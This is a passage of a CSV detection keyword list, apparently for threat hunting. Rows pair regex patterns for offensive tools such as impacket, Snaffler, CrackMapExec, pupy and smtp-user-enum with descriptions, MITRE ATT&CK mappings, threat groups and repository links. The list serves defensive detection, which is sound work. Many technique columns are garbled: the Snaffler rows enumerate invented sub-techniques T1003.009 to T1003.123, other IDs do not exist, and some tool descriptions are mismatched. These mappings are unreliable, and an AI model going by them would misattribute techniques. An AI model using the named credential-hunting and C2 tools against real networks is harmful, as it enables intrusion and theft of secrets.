TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*smb-secrets-revealer.py*",".{0,1000}smb\-secrets\-revealer\.py.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","1","N/A","7","2","146","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "*smbserver.py -payload*",".{0,1000}smbserver\.py\s\-payload.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","474","84","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z" "*smbserver.py -smb2support EXEGOL*",".{0,1000}smbserver\.py\s\-smb2support\sEXEGOL.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*smbserver.py*",".{0,1000}smbserver\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*smbsigning_check*",".{0,1000}smbsigning_check.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*smbspider *",".{0,1000}smbspider\s.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*smbspider.py*",".{0,1000}smbspider\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*smbsr.py*",".{0,1000}smbsr\.py.{0,1000}","offensive_tool_keyword","SMBSR","Lookup for interesting stuff in SMB shares","T1110.001 - T1046 - T1021.002 - T1077.001 - T1069.002 - T1083 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Reconnaissance","https://github.com/oldboy21/SMBSR","1","1","N/A","N/A","2","146","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "*smbsrfile_results.csv*",".{0,1000}smbsrfile_results\.csv.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","7","2","146","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "*smicallef/spiderfoot*",".{0,1000}smicallef\/spiderfoot.{0,1000}","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","1","N/A","6","10","N/A","N/A","N/A","N/A" "*SMShell.sln*",".{0,1000}SMShell\.sln.{0,1000}","offensive_tool_keyword","SMShell","PoC for a SMS-based shell. Send commands and receive responses over SMS from mobile broadband capable computers","T1021.001 - T1059.006 - T1071.004 - T1069.003","TA0002 - TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/persistent-security/SMShell","1","1","N/A","10","10","344","37","2023-05-22T10:40:16Z","2023-05-22T08:26:44Z" "*smtprelayclient.py*",".{0,1000}smtprelayclient\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*smtprelayclient.py*",".{0,1000}smtprelayclient\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*smtp-user-enum * -M EXPN *",".{0,1000}smtp\-user\-enum\s.{0,1000}\s\-M\sEXPN\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*smtp-user-enum * -M RCPT *",".{0,1000}smtp\-user\-enum\s.{0,1000}\s\-M\sRCPT\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*smtp-user-enum * -M VRFY *",".{0,1000}smtp\-user\-enum\s.{0,1000}\s\-M\sVRFY\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*smtp-user-enum*",".{0,1000}smtp\-user\-enum.{0,1000}","offensive_tool_keyword","smtp-user-enum","Username guessing tool primarily for use against the default Solaris SMTP service. Can use either EXPN - VRFY or RCPT TO.","T1133 - T1110.001","TA0007 - TA0006","N/A","N/A","Credential Access","https://pentestmonkey.net/tools/user-enumeration/smtp-user-enum","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*smtp-user-enum.py*",".{0,1000}smtp\-user\-enum\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*SnaffCon/Snaffler*",".{0,1000}SnaffCon\/Snaffler.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1595 - T1592 - T1589 - T1590 - T1591","TA0043","N/A","N/A","Reconnaissance","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1824","186","2024-04-15T05:55:16Z","2020-03-30T07:03:47Z" "*SnaffCore.csproj*",".{0,1000}SnaffCore\.csproj.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1824","186","2024-04-15T05:55:16Z","2020-03-30T07:03:47Z" "*SnaffCore/ActiveDirectory*",".{0,1000}SnaffCore\/ActiveDirectory.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1824","186","2024-04-15T05:55:16Z","2020-03-30T07:03:47Z" "*SnaffCore/Classifiers*",".{0,1000}SnaffCore\/Classifiers.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1824","186","2024-04-15T05:55:16Z","2020-03-30T07:03:47Z" "*SnaffCore/Concurrency*",".{0,1000}SnaffCore\/Concurrency.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1824","186","2024-04-15T05:55:16Z","2020-03-30T07:03:47Z" "*SnaffCore/Config*",".{0,1000}SnaffCore\/Config.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1824","186","2024-04-15T05:55:16Z","2020-03-30T07:03:47Z" "*SnaffCore/ShareFind*",".{0,1000}SnaffCore\/ShareFind.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1824","186","2024-04-15T05:55:16Z","2020-03-30T07:03:47Z" "*SnaffCore/TreeWalk*",".{0,1000}SnaffCore\/TreeWalk.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1824","186","2024-04-15T05:55:16Z","2020-03-30T07:03:47Z" "*Snaffler.csproj*",".{0,1000}Snaffler\.csproj.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1595 - T1592 - T1589 - T1590 - T1591","TA0043","N/A","N/A","Reconnaissance","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1824","186","2024-04-15T05:55:16Z","2020-03-30T07:03:47Z" "*Snaffler.exe*",".{0,1000}Snaffler\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*snaffler.exe*",".{0,1000}snaffler\.exe.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1595 - T1592 - T1589 - T1590 - T1591","TA0043","N/A","N/A","Reconnaissance","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1824","186","2024-04-15T05:55:16Z","2020-03-30T07:03:47Z" "*snaffler.exe*",".{0,1000}snaffler\.exe.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - 